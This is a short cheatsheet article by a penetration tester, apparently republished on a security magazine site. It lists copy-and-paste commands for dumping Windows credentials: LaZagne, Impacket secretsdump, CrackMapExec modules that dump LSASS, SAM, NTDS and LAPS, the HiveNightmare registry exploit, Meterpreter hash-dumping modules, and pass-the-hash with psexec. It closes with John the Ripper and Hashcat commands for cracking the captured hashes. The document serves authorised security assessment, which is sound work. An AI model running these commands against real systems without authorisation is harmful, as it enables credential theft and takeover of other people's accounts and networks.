Windows — Credentials Dumping | by Karol Mazurek

Windows — Credentials Dumping

by Karol Mazurek 


INTRODUCTION

The article presents the current tools & techniques for Windows credential dumping. It will be very short and written in cheatsheet style. The main goal was to aggregate commands in one place, so you can just copy&paste them during the assessment. As a bonus to this short article, in the end, you will find the commands for cracking Windows hashes using John The Ripper and Hashcat.

  1. LaZagne
  2. Impacket
  3. CrackMapExec
  4. HiveNightmare (CVE-2021–36934)
  5. Meterpreter — credential_collector
  6. Meterpreter — smart_hashdump
  • Finding passwords for the most commonly-used software:
laZagne.exe all
findstr /si 'password' *.txt *.xml *.docx
impacket-secretsdump $domain/$user:[email protected]$ip
crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password
gpp-decrypt $encrypted_password
migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector
run post/windows/gather/smart_hashdump

Exploit allowing you to read any registry hives as non-admin.

.\HiveNightmare.exe
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
impacket-psexec -hashes $hash [email protected]$ip
  • LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt
john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt
john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m18200 hash.txt rockyou.txt

About the Author

Karol Mazurek - penetration tester.


The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048

April 4, 2022
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013